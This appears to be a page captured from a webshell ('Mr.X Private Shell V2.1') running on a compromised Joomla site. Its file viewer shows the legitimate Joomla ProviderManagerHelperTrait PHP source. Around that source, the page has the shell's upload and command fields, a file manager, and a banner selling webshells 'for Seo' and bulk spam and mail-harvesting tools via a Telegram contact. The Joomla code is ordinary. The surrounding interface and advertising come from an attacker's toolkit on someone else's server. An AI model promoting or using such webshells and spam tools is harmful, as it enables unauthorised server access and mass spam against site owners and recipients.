__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * @package     Joomla.API
 * @subpackage  com_media
 *
 * @copyright   (C) 2021 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

namespace Joomla\Component\Media\Administrator\Provider;

use Joomla\CMS\Component\ComponentHelper;
use Joomla\CMS\Factory;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Plugin\PluginHelper;
use Joomla\Component\Media\Administrator\Adapter\AdapterInterface;
use Joomla\Component\Media\Administrator\Event\MediaProviderEvent;
use Joomla\Component\Media\Administrator\Exception\ProviderAccountNotFoundException;

// phpcs:disable PSR1.Files.SideEffects
\defined('_JEXEC') or die;
// phpcs:enable PSR1.Files.SideEffects

/**
 * Trait for classes that need adapters.
 *
 * @since  4.1.0
 */
trait ProviderManagerHelperTrait
{
    /**
     * Holds the available media file adapters.
     *
     * @var    ProviderManager
     *
     * @since  4.1.0
     */
    private $providerManager = null;

    /**
     * The default adapter name.
     *
     * @var    string
     *
     * @since  4.1.0
     */
    private $defaultAdapterName = null;

    /**
     * Return a provider manager.
     *
     * @return  ProviderManager
     *
     * @since   4.1.0
     */
    public function getProviderManager(): ProviderManager
    {
        if (!$this->providerManager) {
            // Fire the event to get the results
            $eventParameters = ['context' => 'AdapterManager', 'providerManager' => new ProviderManager()];
            $event           = new MediaProviderEvent('onSetupProviders', $eventParameters);
            PluginHelper::importPlugin('filesystem');
            Factory::getApplication()->triggerEvent('onSetupProviders', $event);
            $this->providerManager = $event->getProviderManager();
        }

        return $this->providerManager;
    }

    /**
     * Returns a provider for the given id.
     *
     * @param   string  $id
     *
     * @return  ProviderInterface
     *
     * @throws \Exception
     * @since   4.1.0
     */
    public function getProvider(string $id): ProviderInterface
    {
        return $this->getProviderManager()->getProvider($id);
    }

    /**
     * Return an adapter for the given name.
     *
     * @param   string  $name
     *
     * @return  AdapterInterface
     *
     * @throws \Exception
     * @since   4.1.0
     */
    public function getAdapter(string $name): AdapterInterface
    {
        return $this->getProviderManager()->getAdapter($name);
    }

    /**
     * Returns an array with the adapter name as key and the path of the file.
     *
     * @param   string  $path
     *
     * @return  array
     *
     * @throws \Exception
     * @since   4.1.0
     */
    protected function resolveAdapterAndPath(string $path): array
    {
        $result = [];
        $parts  = explode(':', $path, 2);

        // If we have 2 parts, we have both an adapter name and a file path
        if (\count($parts) === 2) {
            $result['adapter'] = $parts[0];
            $result['path']    = $parts[1];

            return $result;
        }

        if (!$this->getDefaultAdapterName()) {
            throw new \InvalidArgumentException(Text::_('COM_MEDIA_ERROR_NO_ADAPTER_FOUND'));
        }

        // If we have less than 2 parts, we return a default adapter name
        $result['adapter'] = $this->getDefaultAdapterName();

        // If we have 1 part, we return it as the path. Otherwise we return a default path
        $result['path'] = \count($parts) ? $parts[0] : '/';

        return $result;
    }

    /**
     * Returns the default adapter name.
     *
     * @return  string|null
     *
     * @throws  \Exception
     *
     * @since   4.1.0
     */
    protected function getDefaultAdapterName(): ?string
    {
        if ($this->defaultAdapterName) {
            return $this->defaultAdapterName;
        }

        try {
            // Check for default path in Media config, and whether associated account exists, and use it as default adapter.
            $defaultFilePath = ComponentHelper::getParams('com_media')->get('file_path', 'files');
            $defaultAdapter  = $this->getAdapter('local-' . $defaultFilePath);
            // @TODO: Need a proper configuration for default adapter.
        } catch (ProviderAccountNotFoundException) {
            $defaultAdapter = null;
        }

        if (!$defaultAdapter) {
            // Default adapter were not found, pick the first available local adapter
            $localAdapters  = $this->getProviderManager()->getProvider('local')->getAdapters();
            $defaultAdapter = $localAdapters ? reset($localAdapters) : null;
        }

        if (!$defaultAdapter) {
            return null;
        }

        $this->defaultAdapterName = 'local-' . $defaultAdapter->getAdapterName();

        return $this->defaultAdapterName;
    }
}

Filemanager

Name Type Size Permission Actions
ProviderInterface.php File 1001 B 0664
ProviderManager.php File 3.34 KB 0664
ProviderManagerHelperTrait.php File 4.81 KB 0664
Filemanager